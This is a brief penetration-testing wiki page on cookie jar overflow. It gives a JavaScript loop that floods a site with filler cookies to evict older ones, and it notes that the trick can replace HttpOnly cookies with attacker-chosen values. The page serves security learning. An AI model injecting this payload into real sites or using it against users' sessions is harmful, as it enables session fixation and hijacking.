2025-07-08 13:28:53 +02:00

# Cookie Jar Overflow
{{#include ../../banners/hacktricks-training.md}}
Browsers have a **limit on the number of cookies** they store per site. So if for some reason you need to **make a cookie disappear**, you can **overflow the cookie jar**: once the limit is reached, the oldest cookies are evicted first:
```javascript
// Set many cookies (the Secure flag means this only takes effect on an HTTPS page)
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i}; Secure`
}
// Remove all the filler cookies again by expiring them in the past
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
```
Note that third-party cookies belonging to a different domain won't be evicted, since the limit is enforced per site.
> [!CAUTION]
> This attack can also be used to **overwrite HttpOnly cookies: you can delete them and then set them again with the value you want**.
>
> Check this in [**this post with a lab**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).
{{#include ../../banners/hacktricks-training.md}}